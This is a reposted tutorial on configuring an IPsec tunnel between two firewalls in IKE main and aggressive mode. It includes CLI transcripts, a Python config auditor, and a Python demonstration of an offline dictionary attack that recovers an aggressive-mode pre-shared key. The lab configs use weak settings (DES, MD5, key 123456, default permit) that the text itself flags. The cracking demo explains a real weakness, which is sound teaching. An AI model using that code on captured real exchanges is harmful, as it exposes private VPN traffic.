IPsec in practice
ISAKMP mode (SAs negotiated by IKE)

Lab topology used throughout this page: firewall f1 fronts 192.168.1.0/24 and has WAN address 1.1.1.1/24; firewall f2 fronts 192.168.2.0/24 and has WAN address 1.1.2.1/24; a Layer 3 switch (Quidway) routes between 1.1.1.0/24 (VLAN 10, 1.1.1.2) and 1.1.2.0/24 (VLAN 20, 1.1.2.2). The first half builds the tunnel with fixed addresses and the default IKE exchange mode (main mode); the second half switches to aggressive mode because f1's WAN address is then assigned by DHCP.
F1 configuration:
[f1]inter eth0/0
[f1-Ethernet0/0]ip address 192.168.1.254 24
[f1-Ethernet0/0]loopback        lab only: internal loopback keeps the LAN port up with no cable attached
[f1-Ethernet0/0]inter eth0/1
[f1-Ethernet0/1]ip address 1.1.1.1 24
[f1-Ethernet0/1]quit
[f1]ip route 0.0.0.0 0 1.1.1.2        default route towards the switch
Add the interfaces to security zones:
[f1]fire zone trust
[f1-zone-trust]add inter eth0/0
[f1-zone-trust]quit
[f1]fire zone untrust
[f1-zone-untrust]add inter eth0/1
Build the access control list that selects the traffic to protect:
[f1]acl num 3000
[f1-acl-adv-3000]rule 10 permit ip source 192.168.1.0 0.0.0.255 dest 192.168.2.0 0.0.0.255
[f1-acl-adv-3000]rule 20 deny ip source any dest any
[f1-acl-adv-3000]quit
Only the permit rule matters to IPsec: flows it matches are encrypted, everything else leaves the interface outside the tunnel, in the clear. The trailing deny rule therefore blocks nothing. f2's ACL must be the exact mirror of this one (source and destination swapped), otherwise the two peers will not agree on the phase 2 selectors and the tunnel never comes up.
Create the security proposal:
[f1]ipsec proposal tran1        tran1 is the proposal name
[f1-ipsec-proposal-tran1]?
Ipsec-proposal view commands:
display Display current system information
encapsulation-mode Specify the packet encapsulation mode
esp Specify the ESP protocol(RFC2406) parameters
nslookup Query Internet name servers
ping Ping function
quit Exit from current command view
return Exit to User View
save Save current configuration
tracert Trace route function
transform Specify the security protocol(s) used to transform the
packet
undo Cancel current setting
vrbd Show application version
[f1-ipsec-proposal-tran1]encap ?
transport Only the payload of IP packet is protected(transport mode)
tunnel The entire IP packet is protected(tunnel mode)
[f1-ipsec-proposal-tran1]encap tunnel        encapsulation mode for protected packets (tunnel)
[f1-ipsec-proposal-tran1]transform ?
ah AH protocol defined in RFC2402
ah-esp ESP protocol first, then AH protocol
esp ESP protocol defined in RFC2406
[f1-ipsec-proposal-tran1]transform esp        security protocol used to transform the packets (ESP)
[f1-ipsec-proposal-tran1]esp encry des        encryption algorithm
[f1-ipsec-proposal-tran1]esp auth md5        authentication (integrity) algorithm
[f1-ipsec-proposal-tran1]quit
DES (56-bit key) and MD5 are both obsolete and appear here only because the lab accepts them. On a real deployment choose AES and a SHA-family algorithm from whatever `esp encryption-algorithm ?` and `esp authentication-algorithm ?` list on your release, and use the same proposal on both peers.
Create the IKE peer:
[f1]ike peer f2
Pre-shared key:
[f1-ike-peer-f2]pre-shared-key simple 123456
Peer address:
[f1-ike-peer-f2]remote-address 1.1.2.1
`simple` stores the key in plaintext in the running configuration, and 123456 is a lab value: anyone who reads the config, or who later captures an aggressive mode exchange, can recover it in seconds. Use a long random key and whatever encrypted-storage keyword `pre-shared-key ?` offers on your release.
Create the IPsec policy:
[f1]ipsec policy policy1 10 isakmp        isakmp: the SAs are negotiated by IKE instead of being keyed by hand
[f1-ipsec-policy-isakmp-policy1-10]security acl 3000
[f1-ipsec-policy-isakmp-policy1-10]proposal tran1
Bind the IKE peer:
[f1-ipsec-policy-isakmp-policy1-10]ike-peer f2
Apply the policy to the WAN interface:
[f1]inter eth0/1
[f1-Ethernet0/1]ipsec policy policy1
Configure f2:
[f2]inter eth0/0
[f2-Ethernet0/0]ip address 192.168.2.254 24
[f2-Ethernet0/0]inter eth0/1
[f2-Ethernet0/1]ip address 1.1.2.1 24
[f2-Ethernet0/1]quit
[f2]ip route 0.0.0.0 0 1.1.2.2
[f2]fire pack defau permi        short for firewall packet-filter default permit
This makes f2 forward anything that no rule explicitly denies. It is convenient in the lab but not a production setting: with the normal default-deny you would permit the two LAN subnets to each other, plus UDP 500 (and UDP 4500 when NAT traversal is in use) and ESP between the two WAN addresses, and nothing else.
[f2]fire zone trust
[f2-zone-trust]add inter eth0/0
The interface has been added to trust security zone.
[f2-zone-trust]quit
[f2]fire zone untrust
[f2-zone-untrust]add inter eth0/1
[f2-zone-untrust]quit
[f2]acl num 3000
[f2-acl-adv-3000]rule 10 permit ip source 192.168.2.0 0.0.0.255 dest 192.168.1.0 0.0.0.255
[f2-acl-adv-3000]rule 20 deny ip source any dest any
[f2-acl-adv-3000]quit
[f2]ipsec proposal tran1
[f2-ipsec-proposal-tran1]encap tunnel
[f2-ipsec-proposal-tran1]transform esp
[f2-ipsec-proposal-tran1]esp encry des
[f2-ipsec-proposal-tran1]esp auth md5
[f2-ipsec-proposal-tran1]quit
Create the IKE peer:
[f2]ike peer f1
[f2-ike-peer-f1]pre-share?
pre-shared-key
[f2-ike-peer-f1]pre-shared-key 123456
[f2-ike-peer-f1]remote-address 1.1.1.1
Create the policy:
[f2]ipsec policy policy1 10 isakmp
[f2-ipsec-policy-isakmp-policy1-10]security acl 3000
[f2-ipsec-policy-isakmp-policy1-10]proposal tran1
[f2-ipsec-policy-isakmp-policy1-10]ike-peer f1
[f2-ipsec-policy-isakmp-policy1-10]quit
[f2]inter eth0/1
[f2-Ethernet0/1]ipsec policy policy1
Configure the switch:
[Quidway]vlan 10
[Quidway-vlan10]port eth0/10
[Quidway-vlan10]ip address 1.1.1.2 255.255.255.0
 ^
% Unrecognized command found at '^' position.
(An address cannot be set in VLAN view; it belongs on the VLAN interface, configured below.)
[Quidway-vlan10]vlan 20
[Quidway-vlan20]port eth0/20
[Quidway]inter vlan 10
[Quidway-Vlan-interface10]
%Dec 14 10:30:20 2012 Quidway L2INF/5/VLANIF LINK STATUS CHANGE:
Vlan-interface10: turns into UP state
[Quidway-Vlan-interface10]ip address 1.1.1.2 255.255.255.0
[Quidway-Vlan-interface10]
%Dec 14 10:30:38 2012 Quidway IFNET/5/UPDOWN:Line protocol on the interface Vlan-interface10 turns into UP state
[Quidway-Vlan-interface10]inter vlan 20
[Quidway-Vlan-interface20]
%Dec 14 10:30:45 2012 Quidway L2INF/5/VLANIF LINK STATUS CHANGE:
Vlan-interface20: turns into UP state
[Quidway-Vlan-interface20]ip address 1.1.2.2 255.255.255.0
Test:
[f2]dis ip rout        display the routing table
Routing Table: public net
Destination/Mask Protocol Pre Cost        Nexthop         Interface
0.0.0.0/0 STATIC   60   0           1.1.2.2         Ethernet0/1
1.1.2.0/24 DIRECT   0    0           1.1.2.1         Ethernet0/1
1.1.2.1/32 DIRECT   0    0           127.0.0.1       InLoopBack0
127.0.0.0/8 DIRECT   0    0           127.0.0.1       InLoopBack0
127.0.0.1/32 DIRECT   0    0           127.0.0.1       InLoopBack0
192.168.2.0/24 DIRECT   0    0           192.168.2.254   Ethernet0/0
192.168.2.254/32 DIRECT   0    0           127.0.0.1       InLoopBack0
[f2]ping -a 192.168.2.254 192.168.1.254        -a sets the source address so the probe matches ACL 3000
PING 192.168.1.254: 56 data bytes, press CTRL_C to break
Request time out
Reply from 192.168.1.254: bytes=56 Sequence=2 ttl=255 time=17 ms
Reply from 192.168.1.254: bytes=56 Sequence=3 ttl=255 time=16 ms
Reply from 192.168.1.254: bytes=56 Sequence=4 ttl=255 time=16 ms
Reply from 192.168.1.254: bytes=56 Sequence=5 ttl=255 time=15 ms
--- 192.168.1.254 ping statistics ---
5 packet(s) transmitted
4 packet(s) received
20.00% packet loss
round-trip min/avg/max = 15/16/17 ms
The first request times out because that packet triggers the IKE negotiation (phase 1, then phase 2) and is discarded while the SAs are still being built; the later probes travel through the tunnel. Confirm with `display ike sa` and `display ipsec sa` on either firewall, which should list a phase 1 SA and a phase 2 SA for the peer. A ping without -a would be sourced from 1.1.2.1, not match the ACL, and go out unencrypted.
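Added example, not code from the original page or from the device vendor: a small Python audit that reads Comware-style configuration text for the two peers, checks that the IPsec ACLs mirror each other and flags the weak choices made above (DES, MD5, plaintext and numeric pre-shared keys, a permit-by-default firewall). The two config strings are transcribed from this page's f1 and f2 setups; the line formats it matches on, and the assumption that `pre-shared-key` without a keyword is stored in plaintext, are assumptions about how these commands appear in a saved config.

```python
import re

# Constructed excerpts of the f1/f2 configurations shown on this page
# (transcribed, not pulled from a device).
F1_CONFIG = """\
acl number 3000
 rule 10 permit ip source 192.168.1.0 0.0.0.255 destination 192.168.2.0 0.0.0.255
 rule 20 deny ip source any destination any
ipsec proposal tran1
 encapsulation-mode tunnel
 transform esp
 esp encryption-algorithm des
 esp authentication-algorithm md5
ike peer f2
 pre-shared-key simple 123456
 remote-address 1.1.2.1
ipsec policy policy1 10 isakmp
 security acl 3000
 proposal tran1
 ike-peer f2
"""
F2_CONFIG = """\
firewall packet-filter default permit
acl number 3000
 rule 10 permit ip source 192.168.2.0 0.0.0.255 destination 192.168.1.0 0.0.0.255
 rule 20 deny ip source any destination any
ipsec proposal tran1
 encapsulation-mode tunnel
 transform esp
 esp encryption-algorithm des
 esp authentication-algorithm md5
ike peer f1
 pre-shared-key 123456
 remote-address 1.1.1.1
ipsec policy policy1 10 isakmp
 security acl 3000
 proposal tran1
 ike-peer f1
"""

WEAK_CIPHERS = {"des", "3des"}
WEAK_HASHES = {"md5"}
# "dest" and "destination" are both accepted, as on the page.
RULE_RE = re.compile(
    r"rule\s+\d+\s+permit\s+ip\s+source\s+(\S+)\s+(\S+)\s+dest\w*\s+(\S+)\s+(\S+)")


def parse_config(text):
    """Pull the fields the audit needs out of a Comware-style config dump."""
    cfg = {"permits": [], "cipher": None, "hash": None,
           "psk": None, "psk_plain": False, "default_permit": False}
    for raw in text.splitlines():
        line = raw.strip()
        m = RULE_RE.match(line)
        if m:
            cfg["permits"].append(((m.group(1), m.group(2)), (m.group(3), m.group(4))))
        elif line.startswith("esp encryption-algorithm"):
            cfg["cipher"] = line.split()[-1].lower()
        elif line.startswith("esp authentication-algorithm"):
            cfg["hash"] = line.split()[-1].lower()
        elif line.startswith("pre-shared-key"):
            parts = line.split()
            # Assumption: "pre-shared-key simple KEY" and a bare "pre-shared-key KEY"
            # both leave the key readable; any other keyword means encrypted storage.
            cfg["psk_plain"] = len(parts) == 2 or parts[1] == "simple"
            cfg["psk"] = parts[-1]
        elif line == "firewall packet-filter default permit":
            cfg["default_permit"] = True
    return cfg


def acls_mirror(a, b):
    """Every permit on one side must exist on the other with src/dst swapped."""
    return {(s, d) for s, d in a["permits"]} == {(d, s) for s, d in b["permits"]}


def audit(name_a, a, name_b, b):
    """Return a list of human-readable findings for the peer pair."""
    findings = []
    if not acls_mirror(a, b):
        findings.append(f"{name_a}/{name_b}: IPsec ACLs are not mirror images")
    for name, cfg in ((name_a, a), (name_b, b)):
        if cfg["cipher"] in WEAK_CIPHERS:
            findings.append(f"{name}: weak ESP cipher {cfg['cipher']}")
        if cfg["hash"] in WEAK_HASHES:
            findings.append(f"{name}: weak ESP integrity algorithm {cfg['hash']}")
        if cfg["psk_plain"]:
            findings.append(f"{name}: pre-shared key stored in plaintext")
        if cfg["psk"] is not None and (len(cfg["psk"]) < 16 or cfg["psk"].isdigit()):
            findings.append(f"{name}: pre-shared key is short or numeric (dictionary target)")
        if cfg["default_permit"]:
            findings.append(f"{name}: firewall default action is permit")
    return findings


if __name__ == "__main__":
    for finding in audit("f1", parse_config(F1_CONFIG), "f2", parse_config(F2_CONFIG)):
        print(finding)
```

Run against the page's configs it reports nine findings (four for f1, five for f2) and no ACL mismatch; change one subnet in either ACL and the mirror check fails first, which is the usual reason a freshly configured tunnel refuses to negotiate phase 2.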
Aggressive mode
Aggressive mode: f1 obtains its WAN address automatically

In the setup above each peer identifies the other by IP address (remote-address). Once f1's WAN address comes from DHCP, f2 cannot know it in advance, so the peers are switched to aggressive mode with name-based identities (id-type name, remote-name, ike local-name): f2 accepts the connection from whichever address presents the name f1 together with the right key. Aggressive mode costs security: the identities and the responder's PSK-derived hash travel unencrypted in its three-message exchange, so anyone who captures that exchange can run an offline dictionary attack on the pre-shared key. Main mode sends the same values only after encryption is in place. A long random key, or certificate authentication, is the mitigation.

Configure f2:
[f2]inter eth0/0
[f2-Ethernet0/0]ip address 192.168.2.254 24
[f2-Ethernet0/0]loopback
[f2-Ethernet0/0]inter eth0/1
[f2-Ethernet0/1]ip address 1.1.2.1 24
[f2]ip route 0.0.0.0 0 1.1.2.2
Add the interfaces to security zones:
[f2]firewall packet-filter default permit
[f2]firewall zone trust
[f2-zone-trust]add inter eth0/0
[f2]firewall zone untrust
[f2-zone-untrust]add inter eth0/1
Build the access control list:
[f2]acl number 3000
[f2-acl-adv-3000]rule 10 permit ip source 192.168.2.0 0.0.0.255 dest 192.168.1.0 0.0.0.255
[f2-acl-adv-3000]rule 20 deny ip source any dest any
Create the security proposal:
[f2]ipsec proposal tran1
[f2-ipsec-proposal-tran1]encapsulation-mode tunnel
[f2-ipsec-proposal-tran1]transform esp
[f2-ipsec-proposal-tran1]esp encryption-algorithm des
[f2-ipsec-proposal-tran1]esp authentication-algorithm md5
Create the IKE peer:
[f2]ike peer f1
[f2-ike-peer-f1]?
Ike-peer view commands:
certificate Set certificate parameters
display Display current system information
dpd Configure DPD for this peer
exchange-mode Specify the negotiation mode used in IKE phase 1
id-type Use an address or a name as the ID
local Set the local subnet type of the tunnel
local-address Specify the local IP address
nat Use UDP encapsulation for NAT traversal
nslookup Query Internet name servers
peer Set the remote subnet type of the tunnel
ping Ping function
pre-shared-key Specify the pre-shared key
quit Exit from current command view
remote-address Specify the remote IP address
remote-name Specify the remote gateway name
return Exit to User View
save Save current configuration
tracert Trace route function
undo Cancel current setting
vrbd Show VRP version
[f2-ike-peer-f1]exchange-mode ?
aggressive Aggressive mode
main Main mode
[f2-ike-peer-f1]exchange-mode aggressive
[f2-ike-peer-f1]id-type name        use a name, not an address, as the ID
[f2-ike-peer-f1]pre-shared-key simple 123456
[f2-ike-peer-f1]remote-name f1        the name f1 must present; no remote-address, since f1's address is dynamic
[f2-ike-peer-f1]local-address 1.1.2.1
[f2]ike local-name f2        the name f2 presents to its peers
Create the policy:
[f2]ipsec policy policy1 10 isakmp
[f2-ipsec-policy-isakmp-policy1-10]security acl 3000
[f2-ipsec-policy-isakmp-policy1-10]proposal tran1
[f2-ipsec-policy-isakmp-policy1-10]ike-peer f1
Apply the policy to the WAN interface:
[f2]inter eth0/1
[f2-Ethernet0/1]ipsec policy policy1
Configure f1 (the DHCP client side). Build the access control list:
[f1]acl number 3000
[f1-acl-adv-3000]rule 10 permit ip source 192.168.1.0 0.0.0.255 dest 192.168.2.0 0.0.0.255
[f1-acl-adv-3000]rule 20 deny ip source any dest any
Security proposal:
[f1]ipsec proposal tran1
[f1-ipsec-proposal-tran1]encapsulation-mode tunnel
[f1-ipsec-proposal-tran1]transform esp
[f1-ipsec-proposal-tran1]esp encryption-algorithm des
[f1-ipsec-proposal-tran1]esp authentication-algorithm md5
Create the IKE peer:
[f1]ike peer f2
[f1-ike-peer-f2]exchange-mode aggressive
[f1-ike-peer-f2]id-type name
[f1-ike-peer-f2]remote-address 1.1.2.1        f2's address is static, so f1 can still address it directly
[f1-ike-peer-f2]remote-name f2
No ike local-name is set on f1; the page relies on the default, which on this platform is the device's system name (f1), matching the remote-name configured on f2.
Key:
[f1-ike-peer-f2]pre-shared-key simple 123456
Security policy:
[f1-ike-peer-f2]quit
[f1]ipsec policy policy1 10 isakmp
[f1-ipsec-policy-isakmp-policy1-10]security acl 3000
[f1-ipsec-policy-isakmp-policy1-10]proposal tran1
[f1-ipsec-policy-isakmp-policy1-10]ike-peer f2
[f1-ipsec-policy-isakmp-policy1-10]quit
Apply the policy to the WAN interface:
[f1]inter eth0/1
[f1-Ethernet0/1]ipsec policy policy1
Set the WAN interface to obtain its address automatically:
[f1]inter eth0/1
[f1-Ethernet0/1]ip ?
address Set the IP address of the interface
fast-forwarding Fast-forwarding switch
policy Enable policy routing
relay Relay
urpf Unicast reverse path forwarding
[f1-Ethernet0/1]ip address ?
X.X.X.X IP address
bootp-alloc Obtain an IP address through BOOTP
dhcp-alloc Obtain an IP address through DHCP
[f1-Ethernet0/1]ip address dhcp-alloc
[f1-Ethernet0/1]
%2012/12/13 00:51:52:687 f1 IFNET/4/UPDOWN: line protocol on interface Ethernet0/1 turns into UP state
[f1]inter eth0/0
[f1-Ethernet0/0]ip address 192.168.1.254 24
[f1-Ethernet0/0]loopback
[f1]ip route 0.0.0.0 0 1.1.1.2
Switch configuration:
[Quidway]vlan 10
[Quidway-vlan10]port eth0/10
[Quidway-vlan10]vlan 20
[Quidway-vlan20]port eth0/20
[Quidway-vlan20]quit
[Quidway]inter vlan 10
[Quidway-Vlan-interface10]ip address 1.1.1.2 255.255.255.0
[Quidway]inter vlan 20
[Quidway-Vlan-interface20]
%Dec 14 12:10:27 2012 Quidway L2INF/5/VLANIF LINK STATUS CHANGE:
Vlan-interface20: turns into UP state
[Quidway-Vlan-interface20]ip address 1.1.2.2 255.255.255.0
Set up the DHCP server (the switch hands f1 an address in 1.1.1.0/24 with gateway 1.1.1.2):
[Quidway]dhcp server ip-pool f1
[Quidway-dhcp-f1]network 1.1.1.0 mask 255.255.255.0
[Quidway-dhcp-f1]gateway-list 1.1.1.2
Test:
[f1]ping -a 192.168.1.254 192.168.2.254        -a sets the source address so the probe matches ACL 3000
PING 192.168.2.254: 56 data bytes, press CTRL_C to break
Request time out
Reply from 192.168.2.254: bytes=56 Sequence=2 ttl=255 time=17 ms
Reply from 192.168.2.254: bytes=56 Sequence=3 ttl=255 time=16 ms
Reply from 192.168.2.254: bytes=56 Sequence=4 ttl=255 time=16 ms
Reply from 192.168.2.254: bytes=56 Sequence=5 ttl=255 time=15 ms
--- 192.168.2.254 ping statistics ---
5 packet(s) transmitted
4 packet(s) received
20.00% packet loss
round-trip min/avg/max = 15/16/17 ms
As before, the first packet is lost to the IKE negotiation. `display ike sa` on f2 should now show the phase 1 SA against whatever address DHCP gave f1, since the peer was matched by name rather than by remote-address.
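Added example, not from the original post or the device vendor: a Python reconstruction of the offline attack the aggressive mode caveat above refers to, following the key derivation in RFC 2409 (SKEYID = prf(PSK, Ni_b | Nr_b) and HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)). It assumes HMAC-MD5 as the IKE prf (the page never shows the IKE proposal; whichever prf is negotiated, the attack is the same) and stands in random bytes for the real Diffie-Hellman values, cookies and SA payload, which are constructed here rather than captured. The responder name f2 and the lab key 123456 are the page's; the wordlist is made up. Tools such as psk-crack from the ike-scan package perform exactly this computation over a real capture.

```python
import hashlib
import hmac
import os


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes, prf=hashlib.md5) -> bytes:
    """SKEYID for pre-shared-key authentication: prf(PSK, Ni_b | Nr_b)."""
    return hmac.new(psk, ni_b + nr_b, prf).digest()


def hash_r(psk: bytes, x: dict, prf=hashlib.md5) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    skeyid = skeyid_psk(psk, x["ni_b"], x["nr_b"], prf)
    msg = x["g_xr"] + x["g_xi"] + x["cky_r"] + x["cky_i"] + x["sai_b"] + x["idir_b"]
    return hmac.new(skeyid, msg, prf).digest()


def capture_aggressive_exchange(psk: bytes, responder_name: bytes = b"f2") -> dict:
    """Constructed stand-in for a sniffed aggressive mode exchange.

    Every field returned here is sent unencrypted in messages 1 and 2 of
    aggressive mode, which is what lets an eavesdropper recompute HASH_R
    offline. Random bytes replace the real DH public values, cookies and
    SA payload; the key only feeds the hash the responder sends back.
    """
    x = {
        "g_xi": os.urandom(96), "g_xr": os.urandom(96),   # DH public values
        "cky_i": os.urandom(8), "cky_r": os.urandom(8),   # ISAKMP cookies
        "ni_b": os.urandom(20), "nr_b": os.urandom(20),   # nonces
        "sai_b": os.urandom(40),                          # initiator SA payload body
        # ID payload body: type 2 (ID_FQDN), protocol 0, port 0, then the name
        "idir_b": bytes([2, 0, 0, 0]) + responder_name,
    }
    x["hash_r"] = hash_r(psk, x)   # the responder transmits this in the clear
    return x


def crack_psk(capture: dict, wordlist, prf=hashlib.md5):
    """Offline dictionary attack: recompute HASH_R per candidate and compare."""
    for candidate in wordlist:
        if hmac.compare_digest(hash_r(candidate.encode(), capture, prf), capture["hash_r"]):
            return candidate
    return None


# Constructed wordlist; a real run would use a large dictionary plus mangling rules.
WORDLIST = ["password", "admin", "huawei", "123456", "12345678"]

if __name__ == "__main__":
    cap = capture_aggressive_exchange(b"123456")
    print("recovered PSK:", crack_psk(cap, WORDLIST))
    strong = capture_aggressive_exchange(b"Xq7!v9Lm2pR#t4Wz")
    print("recovered PSK:", crack_psk(strong, WORDLIST))
```

Nothing in the attack needs the initiator's key, a man-in-the-middle position or any interaction with the gateways: one passively captured exchange is enough, and the work is one HMAC per candidate, so the only defence with pre-shared keys in aggressive mode is a key that is not in any dictionary. In main mode the same HASH_R is carried inside the encrypted message 6, so a passive capture does not yield it.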

Reposted from: https://blog.51cto.com/liufan0321/1089065
